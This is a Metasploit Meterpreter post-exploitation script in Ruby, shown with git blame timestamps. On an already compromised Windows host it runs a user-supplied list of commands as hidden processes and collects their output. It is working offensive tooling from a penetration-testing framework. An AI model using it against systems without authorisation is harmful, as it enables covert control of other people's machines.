Files
metasploit-gs/scripts/meterpreter/multicommand.rb
T

106 lines
2.7 KiB
Ruby
Raw Normal View History

2009-10-26 15:14:28 +00:00
# $Id$
2009-06-20 22:21:17 +00:00
#Meterpreter script for running multiple commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Verion: 0.1
################## Variable Declarations ##################
session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-cl" => [ true,"Commands to execute. The command must be enclosed in double quotes and separated by a comma."],
2009-06-20 22:21:17 +00:00
"-f" => [ true,"File where to saved output of command."],
"-rc" => [ true,"Text file with list of commands, one per line."]
2009-06-20 22:21:17 +00:00
)
#Setting Argument variables
2010-08-13 11:38:08 +00:00
commands = nil
script = nil
2009-06-20 22:21:17 +00:00
outfile = nil
help = 0
################## Function Declarations ##################
# Function for running a list of commands stored in a array, returs string
def list_exec(session,cmdlst)
print_status("Running Command List ...")
tmpout = ""
cmdout = ""
r=''
session.response_timeout=120
cmdlst.each do |cmd|
next if cmd.strip.length < 1
next if cmd[0,1] == "#"
2009-06-20 22:21:17 +00:00
begin
print_status "\trunning command #{cmd}"
2010-09-03 01:40:22 +00:00
tmpout = "\n"
2009-06-20 22:21:17 +00:00
tmpout << "*****************************************\n"
tmpout << " Output of #{cmd}\n"
tmpout << "*****************************************\n"
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
while(d = r.channel.read)
tmpout << d
2010-09-03 01:40:22 +00:00
break if d == ""
2009-06-20 22:21:17 +00:00
end
cmdout << tmpout
r.channel.close
2010-09-03 01:40:22 +00:00
#r.close
2009-06-20 22:21:17 +00:00
rescue ::Exception => e
print_status("Error Running Command #{cmd}: #{e.class} #{e}")
end
end
cmdout
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
def usage
print_line("Windows Multi Command Execution Meterpreter Script ")
2009-11-05 00:38:05 +00:00
print_line(@@exec_opts.usage)
2010-04-24 14:59:41 +00:00
raise Rex::Script::Completed
2009-06-20 22:21:17 +00:00
end
2010-12-14 19:28:44 +00:00
2009-06-20 22:21:17 +00:00
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
2010-12-14 19:28:44 +00:00
case opt
2009-06-20 22:21:17 +00:00
2010-12-14 19:28:44 +00:00
when "-cl"
commands = val.split(",")
when "-rc"
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
else
commands ||= ''
::File.open(script, "r").each_line do |line|
commands << line.chomp
end
end
when "-f"
outfile = val
when "-h"
help = 1
end
2009-06-20 22:21:17 +00:00
}
2010-05-03 17:13:09 +00:00
if args.length == 0 or help == 1
2009-06-20 22:21:17 +00:00
usage
2010-08-13 11:38:08 +00:00
elsif commands or script
if outfile
filewrt(outfile, list_exec(session,commands))
else
list_exec(session,commands).each_line do |l|
print_status(l.chomp)
end
2010-04-24 14:59:41 +00:00
end
raise Rex::Script::Completed
2009-06-20 22:21:17 +00:00
else
2010-08-13 11:38:08 +00:00
usage
2009-06-20 22:21:17 +00:00
end